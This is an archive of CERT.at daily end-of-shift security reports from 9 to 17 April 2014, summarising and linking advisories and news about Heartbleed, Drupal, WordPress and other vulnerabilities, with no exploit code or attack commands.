http://news.drweb.com/show/?i=4352&lng=en&c=9 *** Heartbleed Update *** --------------------------------------------- Adobe has evaluated the Creative Cloud and its related services (including Behance and Digital Publishing Suite), the Marketing Cloud solutions and products (including Analytics, Analytics Premium and Experience Manager), EchoSign, Acrobat.com, the Adobe.com store, and other Adobe services. All Adobe internet-facing services known to have been using a version of OpenSSL containing the Heartbleed vulnerability have been mitigated. We are continuing our analysis of Adobe internet-facing servers to identify and remediate any remaining Heartbleed-related risks. --------------------------------------------- http://blogs.adobe.com/psirt/?p=1085 *** Security Advisory-OpenSSL Heartbeat Extension vulnerability (Heartbleed bug) on Huawei multiple products *** --------------------------------------------- Some OpenSSL software versions used in multiple Huawei products have the following OpenSSL vulnerability. Unauthorized remote attackers can dump 64 Kbytes of memory of the connected server or client in each attack. The leaked memory may contain sensitive information, such as passwords and private keys (Vulnerability ID: HWPSIRT-2014-0414). --------------------------------------------- http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor… *** McAfee Security Bulletin - OpenSSL Heartbleed vulnerability patched in McAfee products *** --------------------------------------------- Several McAfee products are vulnerable to OpenSSL Heartbleed. See the McAfee Product Vulnerability Status lists below for the status of each product. --------------------------------------------- https://kc.mcafee.com/corporate/index?page=content&id=SB10071 *** Nagios Remote Plugin Executor 2.15 Remote Command Execution *** --------------------------------------------- Topic: Nagios Remote Plugin Executor 2.15 Remote Command Execution Risk: High Text: - Release date: 17.04.2014 - Discovered by: Dawid Golunski - Severity: High I. VULNER... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014040126 *** MariaDB Multiple Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/58106 *** Debian update for qemu and qemu-kvm *** --------------------------------------------- https://secunia.com/advisories/58088 *** OpenVZ update for kernel *** --------------------------------------------- https://secunia.com/advisories/58060

1 0

Tageszusammenfassung - Donnerstag 17-04-2014
by Daily end-of-shift report 17 Apr '14

17 Apr '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 16-04-2014 18:00 − Donnerstag 17-04-2014 18:00 Handler: Alexander Riepl Co-Handler: Robert Waldner *** Entwickler-Modus gefährdet Blackberries *** --------------------------------------------- Bei aktiviertem Entwickler-Modus können Angreifer über das WLAN oder die USB-Verbindung Schadcode mit vollen Root-Rechten ausführen. Wird der Modus wieder abgeschaltet, ist das Gerät immer noch bis zum nächsten Neustart angreifbar. --------------------------------------------- http://www.heise.de/security/meldung/Entwickler-Modus-gefaehrdet-Blackberri… *** Heartbleed: BSI sieht keinen Grund für Entwarnung *** --------------------------------------------- Das Bundesamt für Sicherheit in der Informationstechnik sieht beim "Heartbleed Bug" weiteren Handlungsbedarf. Kleinere Websites sind nach wie vor verwundbar, auch nehmen Angreifer jetzt andere Dienste ins Visier. --------------------------------------------- http://www.heise.de/security/meldung/Heartbleed-BSI-sieht-keinen-Grund-fuer… *** Bugtraq: [SECURITY] [DSA 2907-1] Announcement of long term support for Debian oldstable *** --------------------------------------------- http://www.securityfocus.com/archive/1/531856 *** mAdserve id SQL injection *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/92545 *** SA-CONTRIB-2014-041 - Block Search - SQL Injection *** --------------------------------------------- Advisory ID: DRUPAL-SA-CONTRIB-2014-041 Project: Block Search (third-party module) Version: 6.x Date: 2014-April-16 Security risk: Highly critical Exploitable from: Remote Vulnerability: SQL Injection Description: Block Search module provides an alternative way of managing blocks.The module doesnt properly use Drupals database API resulting in user-provided strings being passed directly to the database allowing SQL Injection.This vulnerability is mitigated by the fact that an attacker must either use a --------------------------------------------- https://drupal.org/node/2242463 *** SA-CORE-2014-002 - Drupal core - Information Disclosure *** --------------------------------------------- Advisory ID: DRUPAL-SA-CORE-2014-002 Project: Drupal core Version: 6.x, 7.x Date: 2014-April-16 Security risk: Moderately critical Exploitable from: Remote Vulnerability: Information Disclosure Description: Drupals form API has built-in support for temporary storage of form state, for example user input. This is often used on multi-step forms, and is required on Ajax-enabled forms in order to allow the Ajax calls to access and update interim user input on the server.When pages are cached for anonymous --------------------------------------------- https://drupal.org/SA-CORE-2014-002 *** Heartbleed CRL Activity Spike Found, (Wed, Apr 16th) *** --------------------------------------------- It looks like, as I had suspected, the CRL activity numbers we have been seeing did not reflect the real volume caused by the OpenSSL Heartbleed bug. This evening I noticed a massive spike in the amount of revocations being reported by this CRL: http://crl.globalsign.com/gs/gsorganizationvalg2.crl The spike is so large that we initially thought it was a mistake, but we have since confirmed that its real! Were talking about over 50,000 unique recovations from a single CRL: This is by an order --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17977&rss *** Confirmed: Nasty Heartbleed bug exposes OpenVPN private keys, too *** --------------------------------------------- http://feeds.arstechnica.com/~r/arstechnica/security/~3/cz_Y-Ayd5tw/ *** OpenSSL-Bug Heartbleed: Die meisten Router sind laut Herstellerangaben nicht verwundbar *** --------------------------------------------- Die meisten Router-Hersteller geben an, ältere OpenSSL-Versionen zu nutzen. Etliche liefern aber keine Belege dafür, dass ihre Geräte nicht verwundbar sind. Sicherheitsbewusste Nutzer müssen also die Ärmel hochkrempeln und die Geräte selbst testen. --------------------------------------------- http://www.heise.de/security/meldung/OpenSSL-Bug-Heartbleed-Die-meisten-Rou… *** SAP Router Password Timing Attack *** --------------------------------------------- Topic: SAP Router Password Timing Attack Risk: High Text:Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ SAP Router Password Timing Attack 1. *Advisory Inf... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014040118 *** Whats worse than Heartbleed? Bugs in Heartbleed detection scripts. *** --------------------------------------------- As of the writing of this blog post, Nessus, Metasploit, Nmap, and others have released methods for detecting whether your systems are affected. The problem is, most of them have bugs themselves which lead to false negatives results, that is, a result which says a system is not vulnerable when in reality it is. With many people likely running detection scripts or other scans against hosts to check if they need to be patched, it is important that these bugs be addressed before too many people --------------------------------------------- http://www.hut3.net/blog/cns---networks-security/2014/04/14/bugs-in-heartbl… *** Definitionsupdate für Microsoft-Virenscanner bremst Windows XP aus *** --------------------------------------------- http://derstandard.at/1397520906230 *** Zugriff auf SMS-Nachrichten und Tor-Traffic dank Heartbleed *** --------------------------------------------- Hackern ist es gelungen, die von SMS-Gateways verschickten Nachrichten auszulesen - Tokens zur Zwei-Faktor-Authentisierung inklusive. Und auch Tor-Exitnodes geben beliebige Speicherinhalte preis. --------------------------------------------- http://www.heise.de/security/meldung/Zugriff-auf-SMS-Nachrichten-und-Tor-Tr… *** Bleichenbacher-Angriff: TLS-Probleme in Java *** --------------------------------------------- In der TLS-Bibliothek von Java wurde ein Problem gefunden, welches unter Umständen das Entschlüsseln von Verbindungen erlaubt. Es handelt sich dabei um die Wiederbelebung eines Angriffs, der bereits seit 1998 bekannt ist. (Java, Technologie) --------------------------------------------- http://www.golem.de/news/bleichenbacher-angriff-tls-probleme-in-java-1404-1…

1 0

Tageszusammenfassung - Mittwoch 16-04-2014
by Daily end-of-shift report 16 Apr '14

16 Apr '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 15-04-2014 18:00 − Mittwoch 16-04-2014 18:00 Handler: Alexander Riepl Co-Handler: Robert Waldner *** Phishing-Mail: BSI warnt vor BSI-Warnung *** --------------------------------------------- Die regelmäßigen Warnungen des BSI vor gehackten Online-Konten haben offenbar Kriminelle zu einer Phishing-Attacke animiert. Von "verdachtigen Aktivitäten" und "anwaltlichen Schritten" ist darin die Rede. (Phishing, Internet) --------------------------------------------- http://www.golem.de/news/phishing-mail-bsi-warnt-vor-bsi-warnung-1404-10589… *** RSA BSAFE Micro Edition Suite security bypass *** --------------------------------------------- RSA BSAFE Micro Edition Suite (MES) could allow a remote attacker to bypass security restrictions, caused by an error within the certificate chain processing logic. An attacker could exploit this vulnerability to create an improperly authenticated SSL connection. --------------------------------------------- http://xforce.iss.net/xforce/xfdb/92408 *** Chef Multiple Vulnerabilities *** --------------------------------------------- Chef Software has acknowledged multiple security issues and vulnerabilities in Chef, which can be exploited by malicious people to conduct spoofing and cross-site scripting attacks, bypass certain security restrictions, disclose potentially sensitive information, cause a DoS (Denial of Service), and compromise a vulnerable system. --------------------------------------------- https://secunia.com/advisories/57836 *** WordPress Twitget Plugin Cross-Site Request Forgery Vulnerability *** --------------------------------------------- dxwsecurity has reported a vulnerability in the Twitget plugin for WordPress, which can be exploited by malicious people to conduct cross-site request forgery attacks. The application allows users to perform certain actions via HTTP requests without performing proper validity checks to verify the requests. This can be exploited to e.g. change plugin configuration settings when a logged-in administrative user visits a specially crafted web page. --------------------------------------------- https://secunia.com/advisories/57892 *** Critical Patch Update - April 2014 *** --------------------------------------------- Security vulnerabilities addressed by this Critical Patch Update affect the products listed in the categories below. The product area of the patches for the listed versions is shown in the Patch Availability column corresponding to the specified Products and Versions column. --------------------------------------------- http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html *** Innominate mGuard OpenSSL HeartBleed Vulnerability *** --------------------------------------------- OVERVIEW Researcher Bob Radvanovsky of Infracritical has notified NCCIC/ICS-CERT that Innominate has released a new firmware version that mitigates the OpenSSL HeartBleed vulnerability in the mGuard products.This vulnerability could be exploited remotely. Exploits that target the OpenSSL Heartbleed vulnerability are known to be publicly available.AFFECTED PRODUCTSThe following Innominate mGuard versions are affected: --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-105-02 *** Siemens Industrial Products OpenSSL HeartBleed Vulnerability *** --------------------------------------------- OVERVIEWSiemens reported to NCCIC/ICS-CERT a list of products affected by the OpenSSL vulnerability (known as 'Heartbleed'). Joel Langill of Infrastructure Defense Security Services reported to ICS-CERT and Siemens the OpenSSL vulnerability affecting the S7-1500.Siemens has produced an update and Security Advisory (SSA-635659) that mitigates this vulnerability in eLAN and is currently working on updates for the other affected products. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-105-03 *** Looking for malicious traffic in electrical SCADA networks - part 1, (Tue, Apr 15th) *** --------------------------------------------- When infosec guys are performing intrusion detection, they usually look for attacks like portscans, buffer overflows and specific exploit signature. For example, remember OpenSSL heartbleed vulnerability? --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17967&rss *** New Feature: Monitoring Certification Revocation Lists https://isc.sans.edu/crls.html, (Wed, Apr 16th) *** --------------------------------------------- Certificate Revocation Lists (“CRLs”) are used to track revoked certificates. Your browser will download these lists to verify if a certificate presented by a web site has been revoked. The graph above shows how many certificates were revoked each day by the different CRLs we are tracking. --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17969&rss *** Adobe Flash ExternalInterface Use-After-Free *** --------------------------------------------- VUPEN Vulnerability Research Team discovered a critical vulnerability in Adobe Flash. The vulnerability is caused by a use-after-free error when interacting with the "ExternalInterface" class from the browser, which could be exploited to achieve code execution via a malicious web page. --------------------------------------------- http://cxsecurity.com/issue/WLB-2014040102 *** Netgear N600 Password Disclosure / Account Reset *** --------------------------------------------- While i was lurking around the Netgear firmware today i came across various tweaking and others i was able to find a password disclosure,File uploading vulnerably which could compromise the entire router.as of now no patch from the vendor. --------------------------------------------- http://cxsecurity.com/issue/WLB-2014040101 *** Apache Syncope 1.0.8 / 1.1.6 Code Execution *** --------------------------------------------- In the various places in which Apache Commons JEXL expressions are allowed (derived schema definition, user / role templates, account links of resource mappings) a malicious administrator can inject Java code that can be executed remotely by the JEE container running the Apache Syncope core. --------------------------------------------- http://cxsecurity.com/issue/WLB-2014040106 *** Bugtraq: CVE-2014-2735 - WinSCP: missing X.509 validation *** --------------------------------------------- A user can not recognize an easy to perform man-in-the-middle attack, because the client does not validate the "Common Name" of the servers X.509 certificate. In networking environment that is not trustworthy, like a wifi network, using FTP AUTH TLS with WinSCP the servers identity can not be trusted. --------------------------------------------- http://www.securityfocus.com/archive/1/531847 *** Qemu: out of bounds buffer access, guest triggerable via IDE SMART *** --------------------------------------------- An out of bounds memory access flaw was found in Qemu's IDE device model. It leads to Qemu's memory corruption via buffer overwrite(4 bytes). It occurs while executing IDE SMART commands. A guest's user could use this flaw to corrupt Qemu process's memory on the host. --------------------------------------------- http://seclists.org/oss-sec/2014/q2/116 *** Hintergrund: Warum wir Forward Secrecy brauchen *** --------------------------------------------- Der SSL-GAU zeigt nachdrücklich, dass Forward Secrecy kein exotisches Feature für Paranoiker ist. Es ist vielmehr das einzige, was uns noch vor einer vollständigen Komplettüberwachung aller Kommunikation durch die Geheimdienste schützt. --------------------------------------------- http://www.heise.de/security/artikel/Warum-wir-Forward-Secrecy-brauchen-217…

1 0

Tageszusammenfassung - Dienstag 15-04-2014
by Daily end-of-shift report 15 Apr '14

15 Apr '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 14-04-2014 18:00 − Dienstag 15-04-2014 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl *** Barracuda Multiple Products OpenSSL TLS/DTLS Heartbeat Two Information Disclosure Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/57869 *** DSA-2903 strongswan *** --------------------------------------------- http://www.debian.org/security/2014/dsa-2903 *** Occupy Your Icons Silently on Android *** --------------------------------------------- FireEye mobile security researchers have discovered a new Android security issue: a malicious app with normal protection level permissions can probe icons on Android home screen and modify them to point to phishing .. --------------------------------------------- http://www.fireeye.com/blog/uncategorized/2014/04/occupy_your_icons_silentl… *** From the Trenches: AV Evasion With Dynamic Payload Generation *** --------------------------------------------- https://community.rapid7.com/community/metasploit/blog/2014/04/14/from-the-… *** Critical Patch Update - April 2014 - Pre-Release Announcement *** --------------------------------------------- http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html *** First Phase of TrueCrypt Audit Turns Up No Backdoors *** --------------------------------------------- A initial audit of the popular open source encryption software TrueCrypt turned up fewer than a dozen vulnerabilities, none of which so far point toward a backdoor surreptitiously inserted into the codebase. A report on the first phase of the audit was released .. --------------------------------------------- http://beta.slashdot.org/story/200749 *** Microsoft Confirms It Is Dropping Windows 8.1 Support *** --------------------------------------------- Microsoft TechNet blog makes clear that Windows 8.1 will not be patched, and that users must get Windows 8.1 Update if they want security patches, InfoWorlds Woody Leonhard reports. In what is surely the most customer-antagonistic move of the new Windows regime, Steve Thomas at Microsoft posted a TechNet article on Saturday stating categorically that Microsoft will .. --------------------------------------------- http://tech.slashdot.org/story/14/04/15/0053213/microsoft-confirms-it-is-dr… *** VMware reveals 27-patch Heartbleed fix plan *** --------------------------------------------- Go buy your vSysadmins a big choccy egg: their Easter in peril VMware has confirmed that 27 of its products need patches for the Heartbleed bug. --------------------------------------------- http://www.theregister.co.uk/2014/04/15/vmware_reveals_27patch_heartbleed_f… *** Cyberwar-Doku "netwars / out of CTRL": Webdoc bei heise *** --------------------------------------------- heise online präsentiert parallel zur Arte-Doku den ersten Teil der innovativen Multimedia-Dokumentation zum Thema Cyberwar. Sie entscheiden selbst, ob Sie beispielsweise lieber Details zu Stuxnet oder einen Kommentar des Star-Hackers FX sehen möchten. --------------------------------------------- http://www.heise.de/newsticker/meldung/Cyberwar-Doku-netwars-out-of-CTRL-We… *** Samsung Galaxy S5: Fingerabdrucksensor auch schon gehackt *** --------------------------------------------- Mit einer für das iPhone 5S entwickelten Fingerkuppenattrappe trickste Ben Schlabs die Sperre des neuen Samsung-Flagschiffs aus. Er konnte damit dann sogar Geld überweisen. --------------------------------------------- http://www.heise.de/security/meldung/Samsung-Galaxy-S5-Fingerabdrucksensor-… *** SSA-364879 (Last Update 2014-04-15): Vulnerabilities in SINEMA Server *** --------------------------------------------- https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit… *** SSA-654382 (Last Update 2014-04-15): Vulnerabilities in SIMATIC S7-1200 CPU *** --------------------------------------------- https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit… *** Akamai Withdraws Proposed Heartbleed Patch *** --------------------------------------------- As researchers demonstrate OpenSSL bug exploits that retrieve private keys, Akamai rescinds a patch suggestion for the SSL/TLS library after a security researcher punches holes in it. --------------------------------------------- http://www.darkreading.com/application-security/akamai-withdraws-proposed-h… *** (ISC) launches cyber forensics credential in Europe *** --------------------------------------------- Information and software security professional body (ISC)2 has announced the availability of its Certified Cyber Forensics Professional certification in Europe. Registration for CCFP-EU is now open, with the first exam available on 30 April 2014 at Pearson VUE test centres across the region. The German translation of the exam is to be available from 15 June 2014. --------------------------------------------- http://www.computerweekly.com/news/2240218864/ISC2-launches-cyber-forensics… *** BSI warnt vor BSI-Mails *** --------------------------------------------- Betrüger missbrauchen den Namen des BSI für eine Phishing-Kampagne, die vorgibt, dass der Empfänger bei "illegalen Aktivitäten" erwischt wurde. Das BSI rät, den Anhang keinesfalls zu öffnen. --------------------------------------------- http://www.heise.de/security/meldung/BSI-warnt-vor-BSI-Mails-2170549.html *** Hardware Giant LaCie Acknowledges Year-Long Credit Card Breach *** --------------------------------------------- Computer hard drive maker LaCie has acknowledged that a hacker break-in at its online store exposed credit card numbers and contact information on customers for the better part of the past .. --------------------------------------------- http://krebsonsecurity.com/2014/04/hardware-giant-lacie-acknowledges-year-l… *** Synology räumt nach Heartbleed auf: Passwort-Wechsel und Updates *** --------------------------------------------- Nachdem es durch die Heartbleed-Lücke gelang, auf Mail-Adressen und Passwörter von Synology-Nutzern zuzugreifen, fordert der Hersteller seine Kunden nun nachdrücklich zum Passwortwechsel auf. Ausserdem gibt es Security-Updates für die Synology-NAS. --------------------------------------------- http://www.heise.de/security/meldung/Synology-raeumt-nach-Heartbleed-auf-Pa… *** Exploiting CSRF under NoScript Conditions *** --------------------------------------------- https://community.rapid7.com/community/metasploit/blog/2014/04/15/exploitin…

1 0

Tageszusammenfassung - Montag 14-04-2014
by Daily end-of-shift report 14 Apr '14

14 Apr '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 11-04-2014 18:00 − Montag 14-04-2014 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter *** Heartbleed FAQ *** --------------------------------------------- Heartbleed FAQ11. April 2014Wir haben jetzt auch unsere Version einer FAQ zur "Heartbleed" veröffentlicht.Dieses Dokument ist kein finaler Bericht, sondern eine Bestandsaufnahme, die mit neuen Daten aktualisiert werden wird. So sind wir etwa dabei, den Status in Österreich noch genauer zu vermessen. Autor: Otmar Lendl --------------------------------------------- http://www.cert.at/services/blog/20140411232912-1127.html *** Heartbleed: Keys auslesen ist einfacher als gedacht *** --------------------------------------------- Zwei Personen ist es gelungen, private Schlüssel mit Hilfe des Heartbleed-Bugs aus einem nginx-Testserver auszulesen. Der Server gehört der Firma Cloudflare, die mit einem Wettbewerb sicherstellen wollte, dass das Auslesen privater Schlüssel unmöglich ist. (Server, OpenSSL) --------------------------------------------- http://www.golem.de/news/heartbleed-keys-auslesen-ist-einfacher-als-gedacht… *** NSA will nichts von "Heartbleed"-Lücke gewusst haben *** --------------------------------------------- In einem Bericht hatte die Nachrichtenagentur Bloomberg behauptet, die OpenSSL-Lücke sei der NSA seit zwei Jahren bekannt gewesen. Die US-Behörden wiesen das jedoch rasch zurück. --------------------------------------------- http://www.heise.de/security/meldung/NSA-will-nichts-von-Heartbleed-Luecke-… *** Heartbleed zeigt: Google muss Android-Updates in den Griff bekommen *** --------------------------------------------- Nur eine fast zwei Jahre alte Version betroffen, aber viele Millionen Geräte gefährdet - Updates unwahrscheinlich --------------------------------------------- http://derstandard.at/1397301984464 *** "Heartbleed": Noch immer tausende österreichische Webseiten betroffen *** --------------------------------------------- Sicherheitslücke findet sich auf Webservern öffentlicher Einrichtungen - Schulen und Gemeinden betroffen --------------------------------------------- http://derstandard.at/1397302008116 *** Identitätsdiebstahl: 7.500 Domain-Betreiber in Österreich betroffen *** --------------------------------------------- Das Bundeskriminalamt informiert nun alle Betreiber betroffener Domains --------------------------------------------- http://derstandard.at/1397302034346 *** OpenSSL use-after-free race condition read buffer *** --------------------------------------------- Topic: OpenSSL use-after-free race condition read buffer Risk: High Text:About two days ago, I was poking around with OpenSSL to find a way to mitigate Heartbleed. I soon discovered that in its defaul... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014040079 *** Citrix VDI-in-a-Box Discloses Administrator Password to Local Users *** --------------------------------------------- http://www.securitytracker.com/id/1030068 *** Arbitrary Code Execution Bug in Android Reader *** --------------------------------------------- A security vulnerability in Adobe Reader for Android could give an attacker the ability to execute arbitrary code. --------------------------------------------- http://threatpost.com/arbitrary-code-execution-bug-in-android-reader/105421

1 0

Tageszusammenfassung - Freitag 11-04-2014
by Daily end-of-shift report 11 Apr '14

11 Apr '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 10-04-2014 18:00 − Freitag 11-04-2014 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter *** Heartbleed vendor informations / statistics *** --------------------------------------------- https://isc.sans.edu/diary/Heartbleed+vendor+notifications/17929 https://www.cert.fi/en/reports/2014/vulnerability788210.html http://securityaffairs.co/wordpress/23878/intelligence/statistics-impact-he… *** Gehackte Online-Konten: Mehr als zehn Millionen Abrufe von Sicherheitstest *** --------------------------------------------- Auch der zweite Sicherheitscheck des BSI zu gehackten Online-Konten stößt auf großes Interesse. Für Verwirrung sorgt aber weiter eine Sicherheitssperre von GMX und web.de. --------------------------------------------- http://www.golem.de/news/gehackte-online-konten-mehr-als-zehn-millionen-abr… *** The Heartbleed Hit List: The Passwords You Need to Change Right Now *** --------------------------------------------- ... it hasnt always been clear which sites have been affected. Mashable reached out to various companies included on a long list of websites that could potentially have the flaw. Below, weve rounded up the responses from some of the most popular social, email, banking and commerce sites on the web. --------------------------------------------- http://mashable.com/2014/04/09/heartbleed-bug-websites-affected/ *** Heartbleed Vulnerability Affects 5% of Select Top Level Domains from Top 1M *** --------------------------------------------- In trying to gauge the impact of the Heartbleed vulnerability, we proceeded to scanning the Top Level Domain (TLD) names of certain countries extracted from the top 1,000,000 domains by Alexa. We then proceeded to separate the sites which use SSL and further categorized those under "vulnerable" or "safe". The data we were able to... --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/heartbleed-vulne… *** Spionage-Botnet nutzte Heartbleed-Lücke schon vor Monaten aus *** --------------------------------------------- Bereits im November hat ein auf Spionage ausgelegtes Botnet offenbar versucht, durch die OpenSSL-Lücke Daten abzugreifen - möglicherweise im Auftrag eines Geheimdienstes. Die gute Nachricht ist: Die Anzahl der noch verwundbaren Server ist rückläufig. --------------------------------------------- http://www.heise.de/security/meldung/Spionage-Botnet-nutzte-Heartbleed-Luec… *** Heartbleed: Apple-Nutzer sind nicht betroffen *** --------------------------------------------- Weder Mac OS X, iOS noch Apples Dienste wie iCloud sind von der Heartbleed-Schwachstelle betroffen. Denn Apple verzichtet auf OpenSSL. Einige Apps verwenden die Kryptobibliothek jedoch. (Apple, Server-Applikationen) --------------------------------------------- http://www.golem.de/news/heartbleed-apple-nutzer-sind-nicht-betroffen-1404-… *** Heartbleed Explanation *** --------------------------------------------- http://xkcd.com/1354/ *** Critical Update for JetPack WordPress Plugin *** --------------------------------------------- The Jetpack team just released a critical security update to fix a security vulnerability in the Jetpack WordPress plugin. The vulnerability allows an attacker to bypass the site's access control and publish posts on the site. All versions of JetPack since October, 2012 (Jetpack 1.9) are vulnerable, and all users should update to version 2.9.3 --------------------------------------------- http://blog.sucuri.net/2014/04/critical-update-for-jetpack-wordpress-plugin… *** Security Updates for VMware vSphere *** --------------------------------------------- http://www.vmware.com/security/advisories/VMSA-2014-0002.html http://www.vmware.com/security/advisories/VMSA-2014-0003.html *** IBM SPSS Analytic Server Discloses Passwords to Remote Authenticated Users *** --------------------------------------------- http://www.securitytracker.com/id/1030051 *** [2014-04-11] Multiple vulnerabilities in Plex Media Server *** --------------------------------------------- Plex Media Server contains several vulnerability that allow an attacker to intercept traffic between Plex Media Server and clients in plaintext. Furthermore Cross Site Request Forgery (CSRF) vulnerabilities allow an attacker to execute privileged commands in the context of Plex Media Server. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…

1 0

Tageszusammenfassung - Donnerstag 10-04-2014
by Daily end-of-shift report 10 Apr '14

10 Apr '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 09-04-2014 18:00 − Donnerstag 10-04-2014 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter *** Hintergrund: Passwörter in Gefahr - was nun? *** --------------------------------------------- Durch Heartbleed sind theoretisch schon wieder viele Millionen Passwörter in Gefahr. Sicherheitsexperten raten dazu, alle zu ändern. heise-Security-Chefredakteur Jürgen Schmidt schätzt das anders ein. --------------------------------------------- http://www.heise.de/security/artikel/Passwoerter-in-Gefahr-was-nun-2167584.… *** Heartbleed: 600.000 Server immer noch ungeschützt *** --------------------------------------------- Die Sicherheitslücke Heartbleed zieht immer weitere Kreise. Möglicherweise wurde die Schwachstelle schon seit Monaten ausgenutzt. --------------------------------------------- http://futurezone.at/digital-life/heartbleed-600-000-server-immer-noch-unge… *** Sicherheitslücke: Unternehmen können für Schäden durch Heartbleed haftbar sein *** --------------------------------------------- Der Heartbleed-Bug gilt als eine der gravierendsten Sicherheitslücken aller Zeiten. Millionen SSL-gesicherte Websites waren betroffen, erste Missbrauchsfälle sind bekanntgeworden. Können Unternehmen und Admins, die den Fehler nicht behoben haben, für Schäden belangt werden? Golem.de hat nachgefragt. (Ruby, OpenSSL) --------------------------------------------- http://www.golem.de/news/sicherheitsluecke-unternehmen-koennen-fuer-schaede… *** Smartphones vom SSL-GAU (fast) nicht betroffen *** --------------------------------------------- Keine der wichtigen Smartphone-Plattformen setzt in der aktuellen Version eine der für Heartbleed anfälligen OpenSSL-Bibliotheken ein. Lediglich Android-Nutzer mit einer mittelalten Version benötigen ein Update. --------------------------------------------- http://www.heise.de/security/meldung/Smartphones-vom-SSL-GAU-fast-nicht-bet… *** OpenSSL-Bug: Spuren von Heartbleed schon im November 2013 *** --------------------------------------------- Ein Systemadministrator hat angeblich in einem Logfile vom November letzten Jahres Exploit-Code für den Heartbleed-Bug gefunden. Die EFF ruft andere Administratoren zu Nachforschungen auf. (Technologie, Server) --------------------------------------------- http://www.golem.de/news/openssl-bug-spuren-von-heartbleed-schon-im-novembe… *** Kriminalität: Der Untergrund ist digital *** --------------------------------------------- Wie lässt sich gemeinsam gegen die Kriminalität 2.0 vorgehen? Die Antwort auf dem Kongress des Verbandes für Sicherheitstechnik: Verzahnung, engere Kooperationen, Zusammenarbeit & und Hoffen auf aktive Bürger und die Vorratsdatenspeicherung. --------------------------------------------- http://www.heise.de/security/meldung/Kriminalitaet-Der-Untergrund-ist-digit… *** Windows XP: Wechselmuffel im Patch-Dilemma *** --------------------------------------------- Das offizielle Ende des XP-Supports bedeutet nicht, dass keine Patches mehr im Netz auftauchen dürften. Für Nutzer könnte es aber gefährlich werden, solche Dateien zu installieren. (Microsoft, Spam) --------------------------------------------- http://www.golem.de/news/windows-xp-wechselmuffel-im-patch-dilemma-1404-105… *** "Heartbleed"-Lücke - Chance nutzen *** --------------------------------------------- Wie F-Secure in einem Blog-Post schreibt, sollten Administratoren die Aufräumarbeiten im Zuge der "Heartbleed"-Lücke auch gleich nutzen, um die entsprechenden Konfigurationen auf aktuellen Stand zu bringen. F-Secure empfiehlt dazu den OWASP Transport Layer Protection Cheat Sheet, wir schliessen uns dem an und ergänzen um das Better Crypto Hardening Paper (PDF) von bettercrypto.org. --------------------------------------------- http://www.cert.at/services/blog/20140409164644-1090.html *** JSA10623 - 2014-04 Out of Cycle Security Bulletin: Multiple products affected by OpenSSL "Heartbleed" issue (CVE-2014-0160) *** --------------------------------------------- http://kb.juniper.net/index?page=content&id=JSA10623&actp=RSS *** JSA10618 - 2014-04 Security Bulletin: Junos: Kernel panic processing high rate of crafted IGMP packets (CVE-2014-0614) *** --------------------------------------------- http://kb.juniper.net/index?page=content&id=JSA10618&actp=RSS *** OpenVPN Access Server OpenSSL TLS Heartbeat Information Disclosure Vulnerability *** --------------------------------------------- https://secunia.com/advisories/57755 *** Multiple Vulnerabilities in Cisco ASA Software *** --------------------------------------------- Cisco Adaptive Security Appliance (ASA) Software is affected by the following vulnerabilities: Cisco ASA ASDM Privilege Escalation Vulnerability Cisco ASA SSL VPN Privilege Escalation Vulnerability Cisco ASA SSL VPN Authentication Bypass Vulnerability Cisco ASA SIP Denial of Service Vulnerability --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…

1 0

Tageszusammenfassung - Mittwoch 9-04-2014
by Daily end-of-shift report 09 Apr '14

09 Apr '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 08-04-2014 18:00 − Mittwoch 09-04-2014 18:00 Handler: Robert Waldner Co-Handler: n/a *** Security updates available for Adobe Flash Player (APSB14-09) *** --------------------------------------------- A Security Bulletin (APSB14-09) has been published regarding security updates for Adobe Flash Player. These updates address critical vulnerabilities, and Adobe recommends users update their product installations to the latest versions using the instructions referenced in the security bulletin. --------------------------------------------- http://blogs.adobe.com/psirt/?p=1081 *** Assessing risk for the April 2014 security updates *** --------------------------------------------- Today we released four security bulletins addressing 11 unique CVE’s. Two bulletins have a maximum severity rating of Critical while the other two have a maximum severity rating of Important. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment. --------------------------------------------- http://blogs.technet.com/b/srd/archive/2014/04/08/assessing-risk-for-the-ap… *** Summary for April 2014 - Version: 1.0 *** --------------------------------------------- * Vulnerabilities in Microsoft Word and Office Web Apps Could Allow Remote Code Execution * Cumulative Security Update for Internet Explorer * Vulnerability in Windows File Handling Component Could Allow Remote Code Execution * Vulnerability in Microsoft Publisher Could Allow Remote Code Execution --------------------------------------------- http://technet.microsoft.com/en-ca/security/bulletin/ms14-apr *** WordPress 3.8.2 Security Release *** --------------------------------------------- WordPress 3.8.2 is now available. This is an important security release for all previous versions and we strongly encourage you to update your sites immediately. This releases fixes a weakness that could let an attacker force their way into your site by forging authentication cookies --------------------------------------------- http://wordpress.org/news/2014/04/wordpress-3-8-2/ 